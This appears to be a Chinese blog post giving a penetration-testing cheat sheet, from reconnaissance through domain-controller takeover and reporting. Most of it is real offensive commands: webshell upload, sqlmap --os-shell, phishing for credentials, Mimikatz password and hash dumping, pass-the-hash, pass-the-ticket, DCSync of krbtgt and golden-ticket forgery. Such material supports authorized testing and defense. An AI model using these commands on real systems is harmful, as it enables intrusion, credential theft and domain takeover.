横向移动技术详解：PtH、PtT 与黄金票据

AI智能摘要

AI 生成的文章内容摘要

一、渗透测试流程概览

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写

---

二、信息收集阶段

2.1 外网信息收集

# 子域名枚举
subfinder -d target.com -o subs.txt
# 端口扫描 nmap -sS -sV -p- target.com
# 目录扫描 dirsearch -u http://target.com -e php,html,js
# 指纹识别 whatweb http://target.com

2.2 社工库查询

- 邮箱泄露查询：haveibeenpwned.com
- 密码泄露查询：dehashed.com
- 企业邮箱格式：theHarvester

---

三、初始访问

3.1 Web 漏洞利用

# 文件上传漏洞
# 上传 webshell 到 /uploads/shell.php
# SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell
# RCE 漏洞 # Struts2、WebLogic、Fastjson 等

3.2 钓鱼攻击

1. 伪造登录页面
2. 发送钓鱼邮件
3. 获取员工凭证
4. VPN 登录内网

---

四、权限提升

4.1 Windows 提权

# 检查系统信息
systeminfo
whoami /priv
# 检查补丁 wmic qfe list
# 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula

4.2 linux 提权

# 检查内核版本
uname -a

# 检查 sudo 权限 sudo -l
# 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null
# 检查 cron 任务 cat /etc/crontab

---

五、横向移动

5.1 凭证窃取

# Mimikatz 抓取密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
# 导出 hash mimikatz # lsadump::sam

5.2 传递攻击

# PtH（传递 hash）
mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH
# PtT（传递票据） mimikatz # kerberos::ptt admin.ccache

---

六、域控拿下

6.1 域信息收集

# 查看域信息
net domain
nltest /domain_trusts
# 查看域控 nltest /dclist:target.com
# 查看域用户 net user /domain

6.2 黄金票据

# 获取 krbtgt hash
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt
# 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx

---

七、报告编写

7.1 报告结构

1. 执行摘要
2. 漏洞列表（按风险等级）
3. 详细利用过程
4. 修复建议
5. 附录（工具、命令）

---
作者：爪
分类：渗透测试
标签：内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间：2026-04-14